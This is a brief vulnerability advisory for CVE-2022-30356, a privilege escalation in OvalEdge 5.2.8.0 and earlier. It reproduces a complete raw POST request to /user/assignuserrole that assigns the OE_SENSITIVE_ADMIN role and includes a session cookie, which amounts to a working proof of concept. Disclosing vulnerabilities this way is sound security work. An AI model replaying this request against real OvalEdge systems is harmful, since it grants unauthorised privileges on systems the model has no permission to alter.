‼️Privilege Escalation

OvalEdge 5.2.8.0 and earlier is affected by privilege escalation vulnerabilities.

Privilege Escalation - OE_ADMIN role can escalate privileges to any defined role (authenticated)

CVE-2022-30356

OvalEdge 5.2.8.0 and earlier is affected by a Privilege Escalation vulnerability via a POST request to /user/assignuserrole via the userid and role parameters . Authentication is required with OE_ADMIN role.

https://example.com/ovaledge/user/assignuserrole

RAW Request

POST https://example.com/ovaledge/user/assignuserrole HTTP/1.1 Host: example.com Connection: keep-alive Content-Length: 47 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100" Accept:*/* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 sec-ch-ua-platform: "macOS" Origin: https://example.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://example.com/ovaledge/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: oe-loc=en; JSESSIONID=OGQ4MmFkNzYtNThjNS00MjU2LTljNGMtMGMwZjdhYjllZTk2 userid=admin&role=OE_SENSITIVE_ADMIN&action=ADD

Last updated 1 year ago